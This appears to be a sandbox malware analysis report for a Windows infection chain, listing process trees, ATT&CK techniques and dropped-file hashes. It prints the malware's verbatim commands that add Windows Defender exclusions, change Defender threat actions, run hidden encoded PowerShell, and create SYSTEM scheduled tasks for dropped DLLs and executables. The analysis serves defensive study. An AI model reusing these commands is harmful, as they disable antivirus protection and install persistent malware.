C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQWzPuxoy" /SC once /ST 02:30:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gQWzPuxoy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gQWzPuxoy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 02:35:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe\" y7 /nJlrdidrp 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 13562⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exeC:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe y7 /nJlrdidrp 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\UhtGxG.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\zCzpeRf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\FcWcCnF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\pALkSkC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\mTHmWcc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\sECwqfW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 02:43:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\OyLtyjEk\dyVGbCr.dll\",#1 /wpZTdidafP 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QdCYtDviHOrgqJLgZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 20202⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2456 -ip 24561⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\OyLtyjEk\dyVGbCr.dll",#1 /wpZTdidafP 3851181⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\OyLtyjEk\dyVGbCr.dll",#1 /wpZTdidafP 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4160 -ip 41601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2776 -ip 27761⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Defense Evasion
Modify Registry
6Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
3Virtualization/Sandbox Evasion
2Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\$RECYCLE.BIN\S-1-5-18\desktop.iniFilesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
C:\Program Files (x86)\JipyTrDkU\zCzpeRf.xmlFilesize
2KB
MD55fdedc62cf8b6c096029ea2d4e007a2d
SHA1e3886a29d0cc68c3bb76f9478c90da9f1969225c
SHA25639e43e7786d52956285e99ee6f3686c02a7d9bc1895e5aada15a24acd751b417
SHA51258e6293e6d3e497ed5ed13991d5fdeaf7caaef7189ae32f64142fec9a46be1cb45bc6e8c12e5001265054030ed8c1ffb996066a95e91e3e704ae27d1d5ee1a6e
-
C:\Program Files (x86)\YLgKyOFzWxOqC\sECwqfW.xmlFilesize
2KB
MD5a1b78c59aabf4f964c928a2c52a8a55f
SHA1f201d58970d505282aecefa7723bda2f803af354
SHA2560376342f4e89576828a158aa7c828624b6c7a25fc3cab04ee25991a534c49880
SHA5120e60bdc5badf81ba8df2e618fa80c90e3218306c1add37d46df1592a9f665edc2898e227036ea610c6262f7ab032c83dc9846f4970e47f301bae36d0a19377a8
-
C:\Program Files (x86)\krdeMCnRKomDOvwVunR\mTHmWcc.xmlFilesize
2KB
MD57f8cffdee1195bc8fec684d99a7cee6b
SHA1664e11d44b8bc66581a1cacba1a3f88a0527837c
SHA25606ebb85adf2d794a65a44eb6d73f64119fef70c92b5ff8c36b6ac13818f7aec0
SHA5122109cef2b0736a5168fa507167f9a83734ff4e59ebe2a987bbd49b3b5909abd9051108fe43fcfb7c5e23881bb97a08f03b04510021d4034be4c7001975db2c1d
-
C:\Program Files (x86)\tegRANPZONsU2\FcWcCnF.xmlFilesize
2KB
MD559ae709741836f7ce09fdd81cb0fc925
SHA1594e985d3e6390405a6849a0ed69186ddcdcb241
SHA2560d7cb6bbcb37bb926b8e506367dddfe8f47855b234532f945978354d71480c47
SHA512fc8e0449924a299b6ca1b0139e345f814561b107f4069fc4d501870e52a593ad8b7359d4cd3196ca592a8bb1d9e1b21dfc65a03770e9ad79ebba769cab61db7a
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.5MB
MD52a1b63b4db82c956a806d3b9ae026b95
SHA1b13ff5de18fa2480888680f2ea73d6de4a862899
SHA2563138e18b6c8847e8a8e39b0007b4f30b08e85617b350a3d60b5be18459ab3d97
SHA5120e08d585bbadc48e638955233ff266347b2205df2b561b759128f1000c99a94e6921553c6592e93d8e0b095842963533abdb5e7289f964f88af5c9d603f296d5
-
C:\ProgramData\fcblnlcRRSrBhAVB\pALkSkC.xmlFilesize
2KB
MD519c25cc6ddacf15400a952ced837aec1
SHA1908042d314b05e03d497df1204029cc02a12d6c1
SHA256ad7cfaf678541466b742e166eade87e42b102de302387c4af50cf33aa4fb4707
SHA51251a78938e5fd307b7b2ce297287dc22aa913452827bf37df969b8a19d0296481cec696e10dab24ad440c65ceaec874b64eaa71c4de6e6d6ae547d2945ac0b0e9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
11KB
MD5f0227481eed4af85cb65007ce43fe63e
SHA10a89d0550d4e340a63557587740a2393855ce87b
SHA25636e527470bc6b9113a2dfee74d4549287453bad874fb5536436fdd206f86a322
SHA512ba60141f6efcf47f023bc92a259d21ac1501c9c9891883e7353327d52499ee1ba734782720f3ef6758ed62e51cd41ba66fa7b7774aeb531ec1bb902471c5b9c1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
36KB
MD5857ea75cc35b5194b53cd793d3f4283b
SHA120e16c87536cdaf145491cb78db969275cf83e3c
SHA256a0cf672d5788cd311747cc6e640d0d9c597cf1aa594a0bddee215b2cfcad6081
SHA512497fcab1d62074dc2bce04ff259062789c90498198191102d5976982fe7af5b633148de74590f47906b59efa649b422aa9b3c6a7bb06ef2a21e29e68438bebde
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.jsonFilesize
151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD54cca81f8abec33cb394ac2aefcedfbf4
SHA1bb6c24dfe7399a100401937de182153f81819290
SHA25673fdfd6447979ae3715235e930abd986ff997e0be8483c2541ae8942a0927d64
SHA5128fa1afc28a2209b27273cde6ac133031b4456243162a111a98191ed7cc194cb745dc85a32cfa421080e601b734a07f9ef057f81666d13fa1ff56c845815d23bd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD52d3e77e2b756ef40d3f9e7b8e372b3fd
SHA1ed12d740edc87c658b2893c6022b493299196bac
SHA256b41ffe3bf7fc5ec0289202e08dd13c2e7f2b5f9aa243f2f68f054528f78bce7b
SHA512a14a4befa7164e7290783de9b718ed9a93fbc614770fa3d001969da467b28f837fe9d9b1b396a9334203e0f4b4e3a77ed558f2bb5e5849d1e521efda210d8a1a
-
C:\Users\Admin\AppData\Local\Packages\favicon.pngFilesize
5.9MB
MD51603865df23efcd1dc421a48f090b2d5
SHA129c835478c413295787656da1201a3bd08582267
SHA256fc48da13fe7501b9a08daced7a7fadc6914a36c6c12461a73d2170d748be5712
SHA512e9bca0319aa1cacdd86a3b5b5904cd508a245e64399acf335299b298feec130985b68ad3456b177aa466284c6239e952aa15ed0e6545ae6ad72848d3ea6405b1
-
C:\Users\Admin\AppData\Local\Temp\[email protected]Filesize
656B
MD5184a117024f3789681894c67b36ce990
SHA1c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7
-
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.iniFilesize
830B
MD5e6edb41c03bce3f822020878bde4e246
SHA103198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA2569fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA5122d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1
-
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exeFilesize
2.1MB
MD5208bd37e8ead92ed1b933239fb3c7079
SHA1941191eed14fce000cfedbae9acfcb8761eb3492
SHA256e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494
SHA512a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715
-
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exeFilesize
304KB
MD584bf36993bdd61d216e83fe391fcc7fd
SHA1e023212e847a54328aaea05fbe41eb4828855ce6
SHA2568e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf
-
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exeFilesize
518KB
MD5c4ffab152141150528716daa608d5b92
SHA1a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9
-
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exeFilesize
1.2MB
MD50b7e08a8268a6d413a322ff62d389bf9
SHA1e04b849cc01779fe256744ad31562aca833a82c1
SHA256d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65
SHA5123d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4
-
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exeFilesize
778KB
MD505b11e7b711b4aaa512029ffcb529b5a
SHA1a8074cf8a13f21617632951e008cdfdace73bb83
SHA2562aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa
SHA512dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff
-
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exeFilesize
579KB
MD5a991da123f34074f2ee8ea0d798990f9
SHA13988195503348626e8f9185747a216c8e7839130
SHA256fd42e618223f510d694c5fb2f8ecbc1a88cabf003bcf20da6227da30a1352a0f
SHA5121f958cacb820833ea8b5ac2d9ca7f596625e688f8f6b6e3ab6f27aa3b25b8c9e5b57e1eed532a8d2519da6c1b41492eb8ac930fc25eaf2be2f344c2f32e81a49
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeFilesize
1.9MB
MD5eac6fdde5df959773d9f807516197192
SHA1f189d4baabb2e96f819c38a1e2f2de5ad9b037cd
SHA25662ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22
SHA5128ef7a8bb9be5a1a85c01ef747928ef9ad7db2b6ebc379e4d1c61f8a81642ed2b7df09aafcfb25be38dbe5d307453e8bb770905e37a1a62e8406370e28e16fdaf
-
C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exeFilesize
6.6MB
MD50550ef6afda33ea1c1a231b939ca9b07
SHA1f74897166553b218e3a0869502ed036f175be9cd
SHA2568462d8b0433559e9afc2cd5de7bffe38fc6b82e3da9e79bdd33a85ab79fafaeb
SHA512329fa4ba439852740683dfb60070116fc459785d8a936e59aa4e55affe4697d66c5db844d154b30ab41913342fd5d51760f329cf30dc039387d0929026219a2e
-
C:\Users\Admin\AppData\Local\Temp\7zSFE84.tmp\Install.exeFilesize
6.3MB
MD57d1dd60c4b8fb4167645f7093801b6d9
SHA14ae1feb130e57f803ef00709419e6226b7c0e54d
SHA2561c62508e00e567d8f753734590a0a303acad2877681173cb4eed2e1a8409f3e9
SHA5127904bcaefe3d2f0e643f24a2e1eb6f0079e28d7df15f7be0fcd73ecc76680a9a677fe199d8a4d80d08144adbd4769d2a14eac2f933404aeeec05fe103429e872
-
C:\Users\Admin\AppData\Local\Temp\Tmp47E6.tmpFilesize
2KB
MD51420d30f964eac2c85b2ccfe968eebce
SHA1bdf9a6876578a3e38079c4f8cf5d6c79687ad750
